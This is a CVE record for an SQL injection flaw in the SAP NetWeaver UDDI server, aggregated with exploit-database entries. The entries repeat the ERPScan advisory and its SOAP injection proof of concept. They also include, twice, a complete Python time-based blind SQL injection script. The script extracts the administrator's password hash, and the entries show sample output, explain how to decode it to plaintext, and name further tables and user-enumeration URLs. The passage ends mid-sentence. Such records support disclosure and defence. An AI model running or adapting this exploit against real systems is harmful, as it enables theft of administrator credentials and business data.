ID: CVE-2016-2386 | Type: cve | Reporter: cve@mitre.org | Modified: 2018-12-10T19:29:00
Description:
SQL injection vulnerability in the UDDI server in SAP NetWeaver J2EE Engine 7.40 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka SAP Security Note 2101079.
{"exploitdb": [{"lastseen": "2016-05-19T21:35:56", "description": "SAP NetWeaver AS JAVA 7.1 - 7.5 - SQL Injection. CVE-2016-2386. Webapps exploit for xml platform", "published": "2016-05-19T00:00:00", "type": "exploitdb", "title": "SAP NetWeaver AS JAVA 7.1 - 7.5 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386"], "modified": "2016-05-19T00:00:00", "id": "EDB-ID:39840", "href": "https://www.exploit-db.com/exploits/39840/", "sourceData": "Application: SAP NetWeaver AS JAVA\r\nVersions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5\r\nVendor URL: http://SAP.com\r\nBugs: SQL injection\r\nSend: 04.12.2015\r\nReported: 04.12.2015\r\nVendor response: 05.12.2015\r\nDate of Public Advisory: 09.02.2016\r\nReference: SAP Security Note 2101079\r\nAuthor: Vahagn Vardanyan (ERPScan)\r\n\r\n\r\nDescription\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: SAP NetWeaver AS JAVA \u2013 SQL injection vulnerability\r\nAdvisory ID: [ERPSCAN-16-011]\r\nRisk: Critical\r\nAdvisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/\r\nDate published: 09.02.2016\r\nVendors contacted: SAP\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\n\r\nImpact: Resource consumption\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE: 2016-2386\r\nCVSS Information\r\nCVSS Base Score v3: 9.1 / 10\r\nCVSS Base Vector:\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality High (H)\r\nI : Impact to Integrity High(H)\r\nA : Impact to Availability None (N)\r\n\r\n\r\n3. 
VULNERABILITY DESCRIPTION\r\n\r\nAn SQL injection vulnerability means that a code comprises an SQL\r\nstatement that contains strings that can be altered by an attacker.\r\nThe manipulated SQL statement can be used to gain additional data from\r\nthe database or to modify the information.\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nSAP NetWeaver AS JAVA 7.1 - 7.5\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nTo correct this vulnerability, install SAP Security Note 2101079\r\n\r\n\r\n6. AUTHOR\r\n\r\nVahagn Vardanyan (ERPScan)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nBy exploiting this vulnerability, an internal or external attacker can\r\nescalate their privileges. This access allows obtaining sensitive\r\ntechnical and business-related information stored in the vulnerable\r\nSAP system.\r\n\r\n\r\nPoC\r\n\r\nPOST /XXX/UDDISecurityImplBean HTTP/1.1\r\nContent-Type: text/xml\r\n\r\n<SOAP-ENV:Envelope\r\nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n XXX\r\n\r\n<permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or\r\n'1'='1</permissionId>\r\n\r\nXXX\r\n\r\n</SOAP-ENV:Envelope>\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nSent: 04.12.2015\r\nReported: 04.12.2015\r\nVendor response: 05.12.2015\r\nDate of Public Advisory: 09.02.2016\r\n\r\n\r\n9. REFERENCES\r\n\r\nhttps://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\n\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. 
It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\n\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\n\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\n\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\n\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\n\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\n\r\nERPScan is the most respected and credible Business Application\r\nSecurity provider. Founded in 2010, the company operates globally and\r\nenables large Oil and Gas, Financial and Retail organizations to\r\nsecure their mission-critical processes. Named as an \u2018Emerging Vendor\u2019\r\nin Security by CRN, listed among \u201cTOP 100 SAP Solution providers\u201d and\r\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE\r\npartner in discovering and resolving security vulnerabilities. 
ERPScan\r\nconsultants work with SAP SE in Walldorf to assist in improving the\r\nsecurity of their latest solutions.\r\n\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security, and provide solutions to evaluate and secure SAP\r\nand Oracle ERP systems and business-critical applications from both,\r\ncyber-attacks as well as internal fraud. Usually our clients are large\r\nenterprises, Fortune 2000 companies and managed service providers\r\nwhose requirements are to actively monitor and manage security of vast\r\nSAP landscapes on a global scale.\r\n\r\nWe \u2018follow the sun\u2019 and function in two hubs, located in the Palo Alto\r\nand Amsterdam to provide threat intelligence services, agile support\r\nand operate local offices and partner network spanning 20+ countries\r\naround the globe.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39840/"}, {"lastseen": "2018-01-24T14:19:48", "description": "SAP NetWeaver J2EE Engine 7.40 - SQL Injection. CVE-2016-1910,CVE-2016-2386,CVE-2016-2388. 
Webapps exploit for Multiple platform", "published": "2018-01-10T00:00:00", "type": "exploitdb", "title": "SAP NetWeaver J2EE Engine 7.40 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386", "CVE-2016-2388", "CVE-2016-1910"], "modified": "2018-01-10T00:00:00", "id": "EDB-ID:43495", "href": "https://www.exploit-db.com/exploits/43495/", "sourceData": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\"\"\"\r\nAuthor: Vahagn Vardanyan https://twitter.com/vah_13\r\n\r\nBugs:\r\nCVE-2016-2386 SQL injection\r\nCVE-2016-2388 Information disclosure\r\nCVE-2016-1910 Crypto issue\r\n\r\n\r\n\r\nFollow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50\r\n \r\n POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1\r\n\tUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\n\tSOAPAction:\r\n\tContent-Type: text/xml;charset=UTF-8\r\n\tHost: nw74:50000\r\n\tContent-Length: 500\r\n\r\n\t<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\">\r\n\t <soapenv:Header/>\r\n\t <soapenv:Body>\r\n\t\t<sec:deletePermissionById>\r\n\t\t <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>\r\n\t\t</sec:deletePermissionById>\r\n\t </soapenv:Body>\r\n\t</soapenv:Envelope>\r\n \r\n\r\n\r\n\r\nIn SAP test server I have admin user who login is \"Administrator\" and so I used this payload\r\n\r\n %PRIVATE_DATASOURCE.un:Administrator%\r\n\r\nmost SAP's using j2ee_admin username for SAP administrator login\r\n\r\n %PRIVATE_DATASOURCE.un:j2ee_admin%\r\n\r\nYou can get all SAP users login using these URLs (CVE-2016-2388 - information 
disclosure)\r\n\r\n\t1)\thttp:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#\r\n\t2)\thttp:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#\r\n\r\nInstead of J2EE_CONFIGENTRY table you can use this tables\r\n\r\n UME_STRINGS_PERM\r\n UME_STRINGS_ACTN\r\n BC_DDDBDP\r\n BC_COMPVERS\r\n TC_WDRR_MRO_LUT\r\n TC_WDRR_MRO_FILES\r\n T_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection\r\n T_DOMAIN\r\n T_SESSION\r\n UME_ACL_SUP_PERM\r\n UME_ACL_PERM\r\n UME_ACL_PERM_MEM\r\n\r\n\r\nAn example of a working exploit\r\n\r\n\tC:\\Python27\\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000\r\n\tstart to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit\r\n\tthis may take a few minutes\r\n\tFound {SHA-512, 10000, 24}M\r\n\tFound {SHA-512, 10000, 24}MT\r\n\tFound {SHA-512, 10000, 24}MTI\r\n\tFound {SHA-512, 10000, 24}MTIz\r\n\tFound {SHA-512, 10000, 24}MTIzU\r\n\tFound {SHA-512, 10000, 24}MTIzUV\r\n\tFound {SHA-512, 10000, 24}MTIzUVd\r\n\tFound {SHA-512, 10000, 24}MTIzUVdF\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFY\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYX\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXN\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk8\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88F\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X\r\n\r\n\r\nAnd finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text\r\n\r\n\tbase64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasd\u00f3\u00c1q\u00b9\u0080\u00baX\r\n\r\n\"\"\"\r\nimport argparse\r\nimport 
requests\r\nimport string\r\n\r\n_magic = \"{SHA-512, 10000, 24}\"\r\n_wrong_magic = \"{SHA-511, 10000, 24}\"\r\n_xml = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" \" \\\r\n \"xmlns:sec=\\\"http://sap.com/esi/uddi/ejb/security/\\\">\\r\\n <soapenv:Header/>\\r\\n <soapenv:Body>\\r\\n \" \\\r\n \"<sec:deletePermissionById>\\r\\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, \" \\\r\n \"UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{\" \\\r\n \"0}%') AND '1'='1</permissionId>\\r\\n </sec:deletePermissionById>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope> \"\r\nhost = \"\"\r\nport = 0\r\n_dictionary = string.digits + string.uppercase + string.lowercase\r\n\r\ndef _get_timeout(_data):\r\n return requests.post(\"http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean\".format(host, port),\r\n headers={\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 \"\r\n \"Firefox/57.0\",\r\n \"SOAPAction\": \"\",\r\n \"Content-Type\": \"text/xml;charset=UTF-8\"\r\n },\r\n data=_xml.format(_data)).elapsed.total_seconds()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--host')\r\n parser.add_argument('--port')\r\n parser.add_argument('-v')\r\n\r\n args = parser.parse_args()\r\n args_dict = vars(args)\r\n\r\n host = args_dict['host']\r\n port = args_dict['port']\r\n\r\n print \"start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit \".format(host)\r\n _hash = _magic\r\n print \"this may take a few minutes\"\r\n for i in range(24): # you can change it if like to get full hash\r\n for _char in _dictionary:\r\n if not (args_dict['v'] is None):\r\n print \"checking {0}\".format(_hash + _char)\r\n if _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server\r\n _hash += _char\r\n print \"Found \" + _hash\r\n break", "cvss": {"score": 
7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/43495/"}], "zdt": [{"lastseen": "2018-03-14T02:40:42", "description": "Exploit for java platform in category web applications", "edition": 2, "published": "2016-05-19T00:00:00", "type": "zdt", "title": "SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386"], "modified": "2016-05-19T00:00:00", "id": "1337DAY-ID-25051", "href": "https://0day.today/exploit/description/25051", "sourceData": "Application: SAP NetWeaver AS JAVA\r\nVersions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5\r\nVendor URL: http://SAP.com\r\nBugs: SQL injection\r\nSend: 04.12.2015\r\nReported: 04.12.2015\r\nVendor response: 05.12.2015\r\nDate of Public Advisory: 09.02.2016\r\nReference: SAP Security Note 2101079\r\nAuthor: Vahagn Vardanyan (ERPScan)\r\n \r\n \r\nDescription\r\n \r\n1. ADVISORY INFORMATION\r\n \r\nTitle: SAP NetWeaver AS JAVA \u2013 SQL injection vulnerability\r\nAdvisory ID: [ERPSCAN-16-011]\r\nRisk: Critical\r\nAdvisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/\r\nDate published: 09.02.2016\r\nVendors contacted: SAP\r\n \r\n \r\n2. VULNERABILITY INFORMATION\r\n \r\nClass: SQL injection\r\n \r\nImpact: Resource consumption\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE: 2016-2386\r\nCVSS Information\r\nCVSS Base Score v3: 9.1 / 10\r\nCVSS Base Vector:\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality High (H)\r\nI : Impact to Integrity High(H)\r\nA : Impact to Availability None (N)\r\n \r\n \r\n3. 
VULNERABILITY DESCRIPTION\r\n \r\nAn SQL injection vulnerability means that a code comprises an SQL\r\nstatement that contains strings that can be altered by an attacker.\r\nThe manipulated SQL statement can be used to gain additional data from\r\nthe database or to modify the information.\r\n \r\n \r\n4. VULNERABLE PACKAGES\r\n \r\nSAP NetWeaver AS JAVA 7.1 - 7.5\r\n \r\nOther versions are probably affected too, but they were not checked.\r\n \r\n \r\n5. SOLUTIONS AND WORKAROUNDS\r\n \r\nTo correct this vulnerability, install SAP Security Note 2101079\r\n \r\n \r\n6. AUTHOR\r\n \r\nVahagn Vardanyan (ERPScan)\r\n \r\n \r\n7. TECHNICAL DESCRIPTION\r\n \r\nBy exploiting this vulnerability, an internal or external attacker can\r\nescalate their privileges. This access allows obtaining sensitive\r\ntechnical and business-related information stored in the vulnerable\r\nSAP system.\r\n \r\n \r\nPoC\r\n \r\nPOST /XXX/UDDISecurityImplBean HTTP/1.1\r\nContent-Type: text/xml\r\n \r\n<SOAP-ENV:Envelope\r\nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n XXX\r\n \r\n<permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or\r\n'1'='1</permissionId>\r\n \r\nXXX\r\n \r\n</SOAP-ENV:Envelope>\r\n \r\n \r\n8. REPORT TIMELINE\r\n \r\nSent: 04.12.2015\r\nReported: 04.12.2015\r\nVendor response: 05.12.2015\r\nDate of Public Advisory: 09.02.2016\r\n \r\n \r\n9. 
REFERENCES\r\n \r\nhttps://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/25051"}, {"lastseen": "2018-03-31T01:21:30", "description": "Exploit for multiple platform in category web applications", "edition": 1, "published": "2018-01-11T00:00:00", "type": "zdt", "title": "SAP NetWeaver J2EE Engine 7.40 - SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386", "CVE-2016-2388", "CVE-2016-1910"], "modified": "2018-01-11T00:00:00", "href": "https://0day.today/exploit/description/29436", "id": "1337DAY-ID-29436", "sourceData": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\"\"\"\r\nAuthor: Vahagn Vardanyan https://twitter.com/vah_13\r\n \r\nBugs:\r\nCVE-2016-2386 SQL injection\r\nCVE-2016-2388 Information disclosure\r\nCVE-2016-1910 Crypto issue\r\n \r\n \r\n \r\nFollow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50\r\n \r\n POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\n SOAPAction:\r\n Content-Type: text/xml;charset=UTF-8\r\n Host: nw74:50000\r\n Content-Length: 500\r\n \r\n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n <sec:deletePermissionById>\r\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>\r\n </sec:deletePermissionById>\r\n </soapenv:Body>\r\n </soapenv:Envelope>\r\n \r\n \r\n \r\n \r\nIn SAP test server I have admin user who login is \"Administrator\" and so I 
used this payload\r\n \r\n %PRIVATE_DATASOURCE.un:Administrator%\r\n \r\nmost SAP's using j2ee_admin username for SAP administrator login\r\n \r\n %PRIVATE_DATASOURCE.un:j2ee_admin%\r\n \r\nYou can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)\r\n \r\n 1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#\r\n 2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#\r\n \r\nInstead of J2EE_CONFIGENTRY table you can use this tables\r\n \r\n UME_STRINGS_PERM\r\n UME_STRINGS_ACTN\r\n BC_DDDBDP\r\n BC_COMPVERS\r\n TC_WDRR_MRO_LUT\r\n TC_WDRR_MRO_FILES\r\n T_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection\r\n T_DOMAIN\r\n T_SESSION\r\n UME_ACL_SUP_PERM\r\n UME_ACL_PERM\r\n UME_ACL_PERM_MEM\r\n \r\n \r\nAn example of a working exploit\r\n \r\n C:\\Python27\\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000\r\n start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit\r\n this may take a few minutes\r\n Found {SHA-512, 10000, 24}M\r\n Found {SHA-512, 10000, 24}MT\r\n Found {SHA-512, 10000, 24}MTI\r\n Found {SHA-512, 10000, 24}MTIz\r\n Found {SHA-512, 10000, 24}MTIzU\r\n Found {SHA-512, 10000, 24}MTIzUV\r\n Found {SHA-512, 10000, 24}MTIzUVd\r\n Found {SHA-512, 10000, 24}MTIzUVdF\r\n Found {SHA-512, 10000, 24}MTIzUVdFY\r\n Found {SHA-512, 10000, 24}MTIzUVdFYX\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXN\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk8\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6\r\n Found {SHA-512, 10000, 
24}MTIzUVdFYXNk88FxuYC6X\r\n \r\n \r\nAnd finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text\r\n \r\n base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasd\u00f3\u00c1q\u00b9\u0080\u00baX\r\n \r\n\"\"\"\r\nimport argparse\r\nimport requests\r\nimport string\r\n \r\n_magic = \"{SHA-512, 10000, 24}\"\r\n_wrong_magic = \"{SHA-511, 10000, 24}\"\r\n_xml = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" \" \\\r\n \"xmlns:sec=\\\"http://sap.com/esi/uddi/ejb/security/\\\">\\r\\n <soapenv:Header/>\\r\\n <soapenv:Body>\\r\\n \" \\\r\n \"<sec:deletePermissionById>\\r\\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, \" \\\r\n \"UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{\" \\\r\n \"0}%') AND '1'='1</permissionId>\\r\\n </sec:deletePermissionById>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope> \"\r\nhost = \"\"\r\nport = 0\r\n_dictionary = string.digits + string.uppercase + string.lowercase\r\n \r\ndef _get_timeout(_data):\r\n return requests.post(\"http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean\".format(host, port),\r\n headers={\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 \"\r\n \"Firefox/57.0\",\r\n \"SOAPAction\": \"\",\r\n \"Content-Type\": \"text/xml;charset=UTF-8\"\r\n },\r\n data=_xml.format(_data)).elapsed.total_seconds()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--host')\r\n parser.add_argument('--port')\r\n parser.add_argument('-v')\r\n \r\n args = parser.parse_args()\r\n args_dict = vars(args)\r\n \r\n host = args_dict['host']\r\n port = args_dict['port']\r\n \r\n print \"start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit \".format(host)\r\n _hash = _magic\r\n print \"this may take a few minutes\"\r\n for i in range(24): # you can change it if like to get full 
hash\r\n for _char in _dictionary:\r\n if not (args_dict['v'] is None):\r\n print \"checking {0}\".format(_hash + _char)\r\n if _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server\r\n _hash += _char\r\n print \"Found \" + _hash\r\n break\n\n# 0day.today [2018-03-31] #", "sourceHref": "https://0day.today/exploit/29436", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:39", "description": "", "published": "2016-05-19T00:00:00", "type": "packetstorm", "title": "SAP NetWeaver AS JAVA 7.5 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386"], "modified": "2016-05-19T00:00:00", "id": "PACKETSTORM:137129", "href": "https://packetstormsecurity.com/files/137129/SAP-NetWeaver-AS-JAVA-7.5-SQL-Injection.html", "sourceData": "`Application: SAP NetWeaver AS JAVA \n \nVersions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5 \n \nVendor URL: http://SAP.com \n \nBugs: SQL injection \n \nSend: 04.12.2015 \n \nReported: 04.12.2015 \n \nVendor response: 05.12.2015 \n \nDate of Public Advisory: 09.02.2016 \n \nReference: SAP Security Note 2101079 \n \nAuthor: Vahagn Vardanyan (ERPScan) \n \n \n \n \nDescription \n \n \n \n1. ADVISORY INFORMATION \n \nTitle: SAP NetWeaver AS JAVA \u2013 SQL injection vulnerability \n \nAdvisory ID: [ERPSCAN-16-011] \n \nRisk: Critical \n \nAdvisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/ \n \nDate published: 09.02.2016 \n \nVendors contacted: SAP \n \n \n2. 
VULNERABILITY INFORMATION \n \nClass: SQL injection \n \nImpact: Resource consumption \n \nRemotely Exploitable: Yes \n \nLocally Exploitable: No \n \nCVE: 2016-2386 \n \nCVSS Information \n \nCVSS Base Score v3: 9.1 / 10 \n \nCVSS Base Vector: \n \nAV : Access Vector (Related exploit range) Network (N) \n \nAC : Access Complexity (Required attack complexity) Low (L) \n \nAu : Authentication (Level of authentication needed to exploit) None (N) \n \nC : Impact to Confidentiality High (H) \n \nI : Impact to Integrity High(H) \n \nA : Impact to Availability None (N) \n \n \n \n \n \n3. VULNERABILITY DESCRIPTION \n \nAn SQL injection vulnerability means that a code comprises an SQL \nstatement that contains strings that can be altered by an attacker. \nThe manipulated SQL statement can be used to gain additional data from \nthe database or to modify the information. \n \n \n \n \n4. VULNERABLE PACKAGES \n \nSAP NetWeaver AS JAVA 7.1 - 7.5 \n \nOther versions are probably affected too, but they were not checked. \n \n \n5. SOLUTIONS AND WORKAROUNDS \n \nTo correct this vulnerability, install SAP Security Note 2101079 \n \n \n \n6. AUTHOR \n \nVahagn Vardanyan (ERPScan) \n \n \n \n7. TECHNICAL DESCRIPTION \n \nBy exploiting this vulnerability, an internal or external attacker can \nescalate their privileges. This access allows obtaining sensitive \ntechnical and business-related information stored in the vulnerable \nSAP system. \n \n \nPoC \n \nPOST /XXX/UDDISecurityImplBean HTTP/1.1 \nContent-Type: text/xml \n \n<SOAP-ENV:Envelope \nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" \nxmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" \nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"> \nXXX \n \n<permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or \n'1'='1</permissionId> \n \nXXX \n \n</SOAP-ENV:Envelope> \n \n \n \n \n8. 
REPORT TIMELINE \n \nSent: 04.12.2015 \n \nReported: 04.12.2015 \n \nVendor response: 05.12.2015 \n \nDate of Public Advisory: 09.02.2016 \n \n \n \n9. REFERENCES \n \nhttps://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/ \n \n \n10. ABOUT ERPScan Research \n \nThe company\u2019s expertise is based on the research subdivision of \nERPScan, which is engaged in vulnerability research and analysis of \ncritical enterprise applications. It has achieved multiple \nacknowledgments from the largest software vendors like SAP, Oracle, \nMicrosoft, IBM, VMware, HP for discovering more than 400 \nvulnerabilities in their solutions (200 of them just in SAP!). \n \nERPScan researchers are proud to have exposed new types of \nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be \nnominated for the best server-side vulnerability at BlackHat 2013. \n \nERPScan experts have been invited to speak, present, and train at 60+ \nprime international security conferences in 25+ countries across the \ncontinents. These include BlackHat, RSA, HITB, and private SAP \ntrainings in several Fortune 2000 companies. \n \nERPScan researchers lead the project EAS-SEC, which is focused on \nenterprise application security research and awareness. They have \npublished 3 exhaustive annual award-winning surveys about SAP \nsecurity. \n \nERPScan experts have been interviewed by leading media resources and \nfeatured in specialized info-sec publications worldwide. These include \nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, \nHeise, and Chinabyte, to name a few. \n \nWe have highly qualified experts in staff with experience in many \ndifferent fields of security, from web applications and 